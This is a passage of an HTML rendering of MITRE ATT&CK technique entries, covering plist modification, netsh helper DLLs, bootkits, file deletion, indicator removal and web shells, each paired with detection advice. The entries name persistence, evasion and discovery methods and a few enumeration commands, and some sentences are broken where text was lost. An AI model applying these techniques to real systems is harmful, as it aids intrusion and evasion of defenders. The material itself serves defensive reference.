<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://support.microsoft.com/KB/170292">http://support.microsoft.com/KB/170292</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_plist_modification"><a class="anchor" href="#_plist_modification"></a><a class="link" href="#_plist_modification">Plist Modification</a></h3>
<div class="paragraph">
<p>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as &lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user&#8217;s privileges).
Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism[[Citation: Sofacy Komplex Trojan]].</p>
</div>
<div class="paragraph">
<p>Detection: File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.</p>
</div>
<div class="paragraph">
<p>Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 675. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1150">https://attack.mitre.org/wiki/Technique/T1150</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netsh_helper_dll"><a class="anchor" href="#_netsh_helper_dll"></a><a class="link" href="#_netsh_helper_dll">Netsh Helper DLL</a></h3>
<div class="paragraph">
<p>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.[[Citation: TechNet Netsh]] The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another <a id="Persistence"></a> technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe.[[Citation: Demaske Netsh Persistence]]</p>
</div>
<div class="paragraph">
<p>Proof of concept code exists to load Cobalt Strike&#8217;s payload using netsh.exe helper DLLs.[[Citation: Github Netsh Helper CS Beacon]]</p>
</div>
<div class="paragraph">
<p>Detection: It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software.[[Citation: Demaske Netsh Persistence]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: DLL monitoring, Windows Registry, Process monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: Matthew Demaske, Adaptforward</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 676. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1128">https://attack.mitre.org/wiki/Technique/T1128</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/bb490939.aspx">https://technet.microsoft.com/library/bb490939.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/outflankbv/NetshHelperBeacon">https://github.com/outflankbv/NetshHelperBeacon</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html">https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_account_manipulation"><a class="anchor" href="#_account_manipulation"></a><a class="link" href="#_account_manipulation">Account Manipulation</a></h3>
<div class="paragraph">
<p>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</p>
</div>
<div class="paragraph">
<p>Detection: Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738.[[Citation: Microsoft User Modified Event]] Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems.</p>
</div>
<div class="paragraph">
<p>Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, API monitoring, Windows event logs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 677. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1098">https://attack.mitre.org/wiki/Technique/T1098</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/windows/device-security/auditing/event-4738">https://docs.microsoft.com/windows/device-security/auditing/event-4738</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_system_discovery"><a class="anchor" href="#_remote_system_discovery"></a><a class="link" href="#_remote_system_discovery">Remote System Discovery</a></h3>
<div class="paragraph">
<p>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Net.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>Specific to Mac, the &lt;code&gt;bonjour&lt;/code&gt; protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>Utilities such as "ping" and others can be used to gather information about remote systems.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Network protocol analysis, Process monitoring, Process use of network, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 678. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1018">https://attack.mitre.org/wiki/Technique/T1018</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_permission_groups_discovery"><a class="anchor" href="#_permission_groups_discovery"></a><a class="link" href="#_permission_groups_discovery">Permission Groups Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to find local system or domain-level groups and permissions settings.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Examples of commands that can list groups are &lt;code&gt;net group /domain&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; using the Net utility.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, this same thing can be accomplished with the &lt;code&gt;dscacheutil -q group&lt;/code&gt; for the domain, or &lt;code&gt;dscl . -list /Groups&lt;/code&gt; for local groups.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>On Linux, local groups can be enumerated with the &lt;code&gt;groups&lt;/code&gt; command and domain groups via the &lt;code&gt;ldapsearch&lt;/code&gt; command.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 679. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1069">https://attack.mitre.org/wiki/Technique/T1069</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_deletion"><a class="anchor" href="#_file_deletion"></a><a class="link" href="#_file_deletion">File Deletion</a></h3>
<div class="paragraph">
<p>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.</p>
</div>
<div class="paragraph">
<p>There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools.[[Citation: Trend Micro APT Attack Tools]]</p>
</div>
<div class="paragraph">
<p>Detection: It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Binary file metadata</p>
</div>
<div class="paragraph">
<p>Contributors: Walker Johnson</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 680. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1107">https://attack.mitre.org/wiki/Technique/T1107</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/">http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_path_interception"><a class="anchor" href="#_path_interception"></a><a class="link" href="#_path_interception">Path Interception</a></h3>
<div class="paragraph">
<p>Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of cmd in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function.DLL Search Order Hijacking.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.</p>
</div>
<div class="paragraph">
<p>Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through <a id="Discovery"></a>, and [[Lateral Movement]].</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 681. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1034">https://attack.mitre.org/wiki/Technique/T1034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464">https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120">http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/">https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://support.microsoft.com/KB/103000">http://support.microsoft.com/KB/103000</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx">https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/ms682425">http://msdn.microsoft.com/en-us/library/ms682425</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/ms687393">http://msdn.microsoft.com/en-us/library/ms687393</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lc_load_dylib_addition"><a class="anchor" href="#_lc_load_dylib_addition"></a><a class="link" href="#_lc_load_dylib_addition">LC_LOAD_DYLIB Addition</a></h3>
<div class="paragraph">
<p>Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies[[Citation: Writing Bad Malware for OSX]]. There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isnt checked at load time[[Citation: Malware Persistence on OS X]].</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata, Process Monitoring, Process command-line parameters, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 682. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1161">https://attack.mitre.org/wiki/Technique/T1161</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf">https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bootkit"><a class="anchor" href="#_bootkit"></a><a class="link" href="#_bootkit">Bootkit</a></h3>
<div class="paragraph">
<p>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).[[Citation: MTrends 2016]]</p>
</div>
<div class="paragraph">
<p>Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.</p>
</div>
<div class="paragraph">
<p>===Master Boot Record===
The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.[[Citation: Lau 2011]]</p>
</div>
<div class="paragraph">
<p>===Volume Boot Record===
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</p>
</div>
<div class="paragraph">
<p>Detection: Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, MBR, VBR</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 683. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1067">https://attack.mitre.org/wiki/Technique/T1067</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf">https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion">http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_indicator_removal_on_host"><a class="anchor" href="#_indicator_removal_on_host"></a><a class="link" href="#_indicator_removal_on_host">Indicator Removal on Host</a></h3>
<div class="paragraph">
<p>Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.</p>
</div>
<div class="paragraph">
<p>Detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 684. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1070">https://attack.mitre.org/wiki/Technique/T1070</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_re_opened_applications"><a class="anchor" href="#_re_opened_applications"></a><a class="link" href="#_re_opened_applications">Re-opened Applications</a></h3>
<div class="paragraph">
<p>Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine[[Citation: Methods of Mac Malware Persistence]].</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 685. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1164">https://attack.mitre.org/wiki/Technique/T1164</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_other_network_medium"><a class="anchor" href="#_exfiltration_over_other_network_medium"></a><a class="link" href="#_exfiltration_over_other_network_medium">Exfiltration Over Other Network Medium</a></h3>
<div class="paragraph">
<p>Exfiltration could occur over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries could choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</p>
</div>
<div class="paragraph">
<p>Detection: Processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a mouse click or key press) but access the network without such may be malicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 686. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1011">https://attack.mitre.org/wiki/Technique/T1011</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_from_local_system"><a class="anchor" href="#_data_from_local_system"></a><a class="link" href="#_data_from_local_system">Data from Local System</a></h3>
<div class="paragraph">
<p>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 687. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1005">https://attack.mitre.org/wiki/Technique/T1005</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_web_shell"><a class="anchor" href="#_web_shell"></a><a class="link" href="#_web_shell">Web Shell</a></h3>
<div class="paragraph">
<p>A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client).Redundant Access or as a persistence mechanism in case an adversary&#8217;s primary access methods are detected and removed.</p>
</div>
<div class="paragraph">
<p>Detection: Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload:cmd or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server&#8217;s content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network.[[Citation: US-CERT Alert TA15-314A Web Shells]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Authentication logs, Netflow/Enclave netflow, Anti-virus</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 688. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1100">https://attack.mitre.org/wiki/Technique/T1100</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA15-314A">https://www.us-cert.gov/ncas/alerts/TA15-314A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
